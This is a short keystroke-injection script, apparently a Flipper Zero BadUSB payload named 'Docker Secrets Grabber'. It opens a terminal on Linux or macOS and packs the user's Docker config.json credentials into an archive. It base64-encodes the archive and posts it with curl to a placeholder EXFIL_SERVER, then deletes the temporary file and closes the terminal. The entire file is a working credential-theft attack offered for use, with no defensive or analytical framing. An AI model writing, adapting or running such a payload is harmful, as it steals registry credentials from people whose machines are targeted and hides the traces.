REM ===============================================================
REM Docker Secrets Grabber - NullSec Flipper Suite
REM Extracts Docker configurations and secrets
REM ===============================================================
REM Target: Linux/macOS with Docker
REM Author: bad-antics
REM ===============================================================

CTRL ALT t
DELAY 500
STRING bash -c 'tar czf /tmp/docker_secrets.tar.gz ~/.docker/config.json /var/run/docker.sock 2>/dev/null; cat /tmp/docker_secrets.tar.gz | base64 | curl -X POST -d @- http://EXFIL_SERVER/docker; rm /tmp/docker_secrets.tar.gz' &
ENTER
DELAY 100
STRING exit
ENTER
